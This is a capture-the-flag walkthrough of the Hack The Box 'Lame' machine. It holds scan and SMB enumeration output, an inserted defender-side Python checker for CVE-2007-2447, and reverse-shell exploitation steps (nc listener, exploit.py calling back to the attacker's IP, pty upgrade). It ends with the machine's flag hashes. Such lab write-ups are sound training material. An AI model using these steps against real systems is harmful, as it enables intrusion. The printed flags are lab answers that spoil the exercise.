Hack The Box - Lame
Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Difficulty: Easy
OS: Linux
Official machine link: Hack The Box Lame
YouTube video for this machine: Terminal Trouble - HTB Lame
rustscan --addresses "$TARGET" --top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.129.117.112:21
Open 10.129.117.112:22
Open 10.129.117.112:139
Open 10.129.117.112:445
Open 10.129.117.112:3632
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-16 22:07 CET
Initiating Ping Scan at 22:07
Scanning 10.129.117.112 [4 ports]
Completed Ping Scan at 22:07, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:07
Scanning lame.htb (10.129.117.112) [5 ports]
Discovered open port 21/tcp on 10.129.117.112
Discovered open port 22/tcp on 10.129.117.112
Discovered open port 3632/tcp on 10.129.117.112
Discovered open port 445/tcp on 10.129.117.112
Discovered open port 139/tcp on 10.129.117.112
Completed SYN Stealth Scan at 22:07, 0.07s elapsed (5 total ports)
Nmap scan report for lame.htb (10.129.117.112)
Host is up, received echo-reply ttl 63 (0.045s latency).
Scanned at 2024-12-16 22:07:33 CET for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
3632/tcp open distccd syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Raw packets sent: 9 (372B) | Rcvd: 6 (248B)
enum4linux-ng -A $TARGET
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.117.112
[*] Username ......... ''
[*] Random Username .. 'hnriocui'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 10.129.117.112 |
=======================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.117.112 |
=============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
===========================================
| SMB Dialect Check on 10.129.117.112 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
=============================================================
| Domain Information via SMB session for 10.129.117.112 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAME
NetBIOS domain name: ''
DNS domain: hackthebox.gr
FQDN: lame.hackthebox.gr
Derived membership: workgroup member
Derived domain: unknown
===========================================
| RPC Session Check on 10.129.117.112 |
===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
=====================================================
| Domain Information via RPC for 10.129.117.112 |
=====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member
=================================================
| OS Information via RPC for 10.129.117.112 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)
=======================================
| Users via RPC on 10.129.117.112 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
username: root
name: root
acb: '0x00000011'
description: (null)
'1002':
username: daemon
name: daemon
acb: '0x00000011'
description: (null)
'1004':
username: bin
name: bin
acb: '0x00000011'
description: (null)
'1006':
username: sys
name: sys
acb: '0x00000011'
description: (null)
'1008':
username: sync
name: sync
acb: '0x00000011'
description: (null)
'1010':
username: games
name: games
acb: '0x00000011'
description: (null)
'1012':
username: man
name: man
acb: '0x00000011'
description: (null)
'1014':
username: lp
name: lp
acb: '0x00000011'
description: (null)
'1016':
username: mail
name: mail
acb: '0x00000011'
description: (null)
'1018':
username: news
name: news
acb: '0x00000011'
description: (null)
'1020':
username: uucp
name: uucp
acb: '0x00000011'
description: (null)
'1026':
username: proxy
name: proxy
acb: '0x00000011'
description: (null)
'1066':
username: www-data
name: www-data
acb: '0x00000011'
description: (null)
'1068':
username: backup
name: backup
acb: '0x00000011'
description: (null)
'1076':
username: list
name: Mailing List Manager
acb: '0x00000011'
description: (null)
'1078':
username: irc
name: ircd
acb: '0x00000011'
description: (null)
'1082':
username: gnats
name: Gnats Bug-Reporting System (admin)
acb: '0x00000011'
description: (null)
'1200':
username: libuuid
name: (null)
acb: '0x00000011'
description: (null)
'1202':
username: dhcp
name: (null)
acb: '0x00000011'
description: (null)
'1204':
username: syslog
name: (null)
acb: '0x00000011'
description: (null)
'1206':
username: klog
name: (null)
acb: '0x00000011'
description: (null)
'1208':
username: sshd
name: (null)
acb: '0x00000011'
description: (null)
'1210':
username: bind
name: (null)
acb: '0x00000011'
description: (null)
'1212':
username: postfix
name: (null)
acb: '0x00000011'
description: (null)
'1214':
username: ftp
name: (null)
acb: '0x00000011'
description: (null)
'1216':
username: postgres
name: PostgreSQL administrator,,,
acb: '0x00000011'
description: (null)
'1218':
username: mysql
name: MySQL Server,,,
acb: '0x00000011'
description: (null)
'1220':
username: tomcat55
name: (null)
acb: '0x00000011'
description: (null)
'1222':
username: distccd
name: (null)
acb: '0x00000011'
description: (null)
'1224':
username: telnetd
name: (null)
acb: '0x00000011'
description: (null)
'1226':
username: proftpd
name: (null)
acb: '0x00000011'
description: (null)
'3000':
username: msfadmin
name: msfadmin,,,
acb: '0x00000010'
description: (null)
'3002':
username: user
name: just a user,111,,
acb: '0x00000010'
description: (null)
'3004':
username: service
name: ',,,'
acb: '0x00000011'
description: (null)
'501':
username: nobody
name: nobody
acb: '0x00000011'
description: (null)
========================================
| Groups via RPC on 10.129.117.112 |
========================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'
========================================
| Shares via RPC on 10.129.117.112 |
========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
comment: IPC Service (lame server (Samba 3.0.20-Debian))
type: IPC
IPC$:
comment: IPC Service (lame server (Samba 3.0.20-Debian))
type: IPC
opt:
comment: ''
type: Disk
print$:
comment: Printer Drivers
type: Disk
tmp:
comment: oh noes!
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share opt
[+] Mapping: DENIED, Listing: N/A
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share tmp
[+] Mapping: OK, Listing: OK
===========================================
| Policies via RPC for 10.129.117.112 |
===========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: STATUS_ACCESS_DENIED
===========================================
| Printers via RPC for 10.129.117.112 |
===========================================
[+] No printers returned (this is not an error)
Completed after 25.29 seconds
Found vulnerable Samba version: CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'username map script' Command Execution
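The enumeration above surfaces four weaknesses at once: a Samba build in the CVE-2007-2447 affected range, an SMB1-only server, signing not required, and a null session accepted. The following Python script is an added example (not part of this writeup or of the linked exploit) that turns those observations into a repeatable defender-side check: it parses enum4linux-ng-style text for the version and the dialect/signing/null-session lines, and separately scans an smb.conf fragment for the `username map script` directive that the CVE is tied to. Both inputs are constructed samples modelled on the output above; the smb.conf path is hypothetical.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample modelled on the enum4linux-ng output in this writeup; not a live capture.
SAMPLE_ENUM_OUTPUT = """\
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: true
SMB 2.02: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[+] Server allows session using username '', password ''
Native LAN manager: Samba 3.0.20-Debian
"""

# Constructed smb.conf fragment; the script path is hypothetical.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""

VERSION_RE = re.compile(r"Samba\s+(\d+)\.(\d+)\.(\d+)")
# Affected range as stated on the page: 3.0.20 up to (not including) 3.0.25rc.
CVE_2007_2447_MIN = (3, 0, 20)
CVE_2007_2447_FIXED = (3, 0, 25)


def parse_samba_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from a 'Samba X.Y.Z' banner, or None."""
    m = VERSION_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def flag_value(text: str, key: str) -> Optional[bool]:
    """Read a 'key: true/false' line from enum4linux-ng output; None if absent."""
    m = re.search(rf"^{re.escape(key)}:\s*(true|false)\s*$", text, re.M | re.I)
    return m.group(1).lower() == "true" if m else None


def assess_enum_output(text: str) -> List[str]:
    """Map enumeration output to findings with the corresponding smb.conf fix."""
    findings = []
    ver = parse_samba_version(text)
    if ver and CVE_2007_2447_MIN <= ver < CVE_2007_2447_FIXED:
        findings.append(
            f"Samba {'.'.join(map(str, ver))} is in the CVE-2007-2447 affected "
            "range: upgrade to 3.0.25 or later"
        )
    if flag_value(text, "SMB1 only"):
        findings.append("SMB1 only: set 'server min protocol = SMB2' in smb.conf")
    if flag_value(text, "SMB signing required") is False:
        findings.append("signing not required: set 'server signing = mandatory'")
    if "allows session using username ''" in text:
        findings.append("null session accepted: set 'restrict anonymous = 2'")
    return findings


def assess_smb_conf(conf: str) -> List[str]:
    """Flag the directive CVE-2007-2447 depends on, ignoring commented lines."""
    findings = []
    for line in conf.splitlines():
        s = line.strip()
        if s.startswith((";", "#")):
            continue
        if re.match(r"username\s+map\s+script\s*=", s, re.I):
            findings.append(
                f"'username map script' configured ({s}): remove it unless the "
                "Samba build is patched for CVE-2007-2447"
            )
    return findings


if __name__ == "__main__":
    for f in assess_enum_output(SAMPLE_ENUM_OUTPUT) + assess_smb_conf(SAMPLE_SMB_CONF):
        print("[!]", f)
```

Run it against saved enum4linux-ng output (`python3 check.py` with the sample replaced by `open(path).read()`) after a remediation change to confirm that all four findings disappear; the version check alone is not enough, since the SMB1-only and signing findings remain even after Samba is upgraded unless smb.conf is tightened too.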
Exploit - https://github.com/TerminalTrouble/CVE-2007-2447
Install the Python SMB library:
pip3 install pysmb
Start a listener:
rlwrap nc -lvnp 1337
Execute the exploit:
python3 exploit.py $IP 139 10.10.14.149 1337
Upgrade the shell to a full TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Locate user flag
root@lame:/root# find /home/
find /home/
/home/
/home/service
/home/service/.profile
/home/service/.bashrc
/home/service/.bash_logout
/home/ftp
/home/makis
/home/makis/user.txt
/home/makis/.profile
/home/makis/.sudo_as_admin_successful
/home/makis/.bash_history
/home/makis/.bashrc
/home/makis/.bash_logout
/home/user
/home/user/.ssh
/home/user/.ssh/id_dsa.pub
/home/user/.ssh/id_dsa
/home/user/.profile
/home/user/.bash_history
/home/user/.bashrc
/home/user/.bash_logout
user - /home/makis/user.txt: 4856f0131ec6755a26b1186dbf2dbb33
root - /root/root.txt: ed2b7155b71d373f2015df9e3c13c06e